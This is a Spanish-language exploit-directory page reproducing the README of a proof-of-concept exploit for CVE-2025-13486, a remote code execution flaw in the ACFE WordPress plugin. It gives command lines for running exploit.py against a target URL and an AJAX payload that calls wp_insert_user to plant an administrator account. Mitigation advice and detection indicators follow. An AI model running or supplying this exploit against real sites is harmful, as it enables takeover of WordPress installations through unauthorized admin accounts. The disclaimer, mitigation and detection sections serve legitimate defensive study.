Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Creación de Administrador | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Creación de Administrador

Ver Repositorio
112hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔴 CVE-2025-13486 - Exploit del Plugin de WordPress Advanced Custom Fields Extended (ACFE)

WordPress Python License Status

Logotipo de WordPress

📋 Resumen

Exploit de prueba de concepto para CVE-2025-13486, una vulnerabilidad crítica en el plugin de WordPress Advanced Custom Fields: Extended (ACFE) que permite la Ejecución Remota de Código que conduce a la Escalada de Privilegios.

🎯 Detalles de la Vulnerabilidad

AspectoDetalles
ID CVECVE-2025-13486
PluginAdvanced Custom Fields: Extended (ACFE)
TipoEjecución Remota de Código → Escalada de Privilegios
Nivel de RiesgoCrítico
Versiones AfectadasVersiones vulnerables de ACFE (versiones específicas pendientes)
Puntuación CVSS9.8 CRÍTICO
Fecha de Descubrimiento2025
Autor0xgh057r3c0n

⚠️ DESCARGO DE RESPONSABILIDAD SOBRE USO ÉTICO

⚠️ ADVERTENCIA: Esta herramienta es SOLO para pruebas de seguridad autorizadas y fines educativos.

✅ Uso Permitido:

  • Investigación y educación en seguridad
  • Pruebas en tus propios sistemas
  • Pruebas de penetración autorizadas con permiso por escrito
  • Investigación académica y docencia
  • Capacitación en concienciación sobre seguridad

❌ Uso Prohibido:

  • Pruebas no autorizadas en sistemas que no te pertenecen
  • Ataques maliciosos o hacking
  • Cualquier actividad ilegal
  • Violación de leyes de fraude informático (CFAA, etc.)
  • Pruebas de seguridad no éticas

El autor no es responsable por el mal uso de esta herramienta. Siempre obtén la autorización por escrito adecuada antes de probar cualquier sistema.

🔧 Características

🔍 Modo de Verificación

  • Extracción de nonce de páginas de WordPress
  • Confirmación de vulnerabilidad usando la función print_r
  • Verificación segura sin explotación
  • Coincidencia de múltiples patrones para detección de nonce

⚡ Modo de Explotación

  • Creación de usuario administrador mediante wp_insert_user
  • Credenciales personalizadas o generadas aleatoriamente
  • Soporte para nombres de usuario, contraseñas y correos electrónicos personalizados
  • Análisis de respuesta para indicadores de éxito

🛠️ Características Técnicas

  • Detección automática de protocolo (HTTP/HTTPS)
  • Salida de terminal con códigos de color
  • Omisión de verificación SSL para entornos de prueba
  • Reporte detallado de errores y depuración
  • Manejo de tiempo de espera de sesión y conexión

📦 Instalación

Requisitos

  • Python 3.6+
  • librería requests

Configuración

# Clone repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# Install dependencies
pip install requests

# Alternative: Install from requirements.txt
pip install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x exploit.py

Dependencias

Create a requirements.txt file:

requests>=2.25.1

🚀 Uso

Sintaxis Básica

python3 exploit.py --url <TARGET_URL> [OPTIONS]

Ejemplos

1. Verificar Solo la Vulnerabilidad (Prueba Segura)

python3 exploit.py --url http://target.com --verify

2. Explotar con Credenciales Aleatorias

python3 exploit.py --url https://target.com

3. Explotar con Credenciales Personalizadas

python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. Objetivo sin Protocolo (Detección Automática)

python3 exploit.py --url target.com --verify

Opciones de Línea de Comandos

OpciónDescripciónRequeridoPor Defecto
-u, --urlURL de WordPress objetivoSí-
--verifySolo verificar, sin explotaciónNoFalso
--userNombre de usuario personalizado para adminNoadmin_XXXXX
--passwordContraseña personalizada para adminNo12 caracteres aleatorios
--emailCorreo electrónico personalizado para adminNo[email protected]

🧪 Cómo Funciona

1. Mecanismo de Vulnerabilidad

El exploit aprovecha el manejo inadecuado de funciones en el endpoint acfe/form/render_form_ajax del plugin ACFE, permitiendo a los atacantes llamar funciones PHP arbitrarias.

2. Flujo Técnico

1. URL Validation → Auto-detects HTTP/HTTPS
2. Nonce Extraction → Scans page for ACF nonce
3. Payload Construction → Builds malicious AJAX request
4. Request Execution → Sends exploit to target
5. Result Analysis → Checks for success indicators

3. Payload de Explotación

// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));

// Exploit payload structure
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "extracted_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "attacker_user",
    "form[user_pass]": "attacker_pass",
    "form[user_email]": "[email protected]",
    "form[role]": "administrator"
}

🛡️ Mitigación

Acciones Inmediatas

  1. Actualizar Plugin: Actualizar inmediatamente el plugin ACFE a la última versión
  2. Eliminar Plugin: Si no hay actualización disponible, deshabilitar temporalmente ACFE
  3. Firewall de Aplicaciones Web: Implementar reglas WAF para bloquear solicitudes maliciosas
  4. Monitoreo: Monitorear la creación sospechosa de usuarios administradores

Endurecimiento de Seguridad de WordPress

# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits

🔍 Detección

Indicadores de Compromiso (IOCs)

  • Creación no autorizada de usuarios administradores
  • Solicitudes AJAX sospechosas a /wp-admin/admin-ajax.php
  • Solicitudes con action=acfe/form/render_form_ajax
  • Llamadas inesperadas a la función wp_insert_user vía AJAX

Monitoreo de Registros

# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 Referencias

  1. Repositorio de Plugins de WordPress: Advanced Custom Fields: Extended
  2. Base de Datos CVE: CVE-2025-13486
  3. Equipo de Seguridad de WordPress: Guías de Seguridad para Plugins
  4. OWASP Top 10: Ataques de Inyección

🤝 Contribuciones

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad (git checkout -b feature/improvement)
  3. Realiza commits (git commit -am 'Añadir nueva funcionalidad')
  4. Sube la rama (git push origin feature/improvement)
  5. Crea un Pull Request

Guías para Contribuidores

  • Sigue la guía de estilo PEP 8 de Python
  • Añade comentarios para lógica compleja
  • Incluye manejo de errores
  • Actualiza la documentación

🐛 Reportar Problemas

Por favor, reporta errores y problemas mediante:

  1. Issues de GitHub: Crear Nuevo Issue
  2. Vulnerabilidades de Seguridad: Divulgación responsable al autor primero

📊 Estructura del Proyecto

Descargar herramienta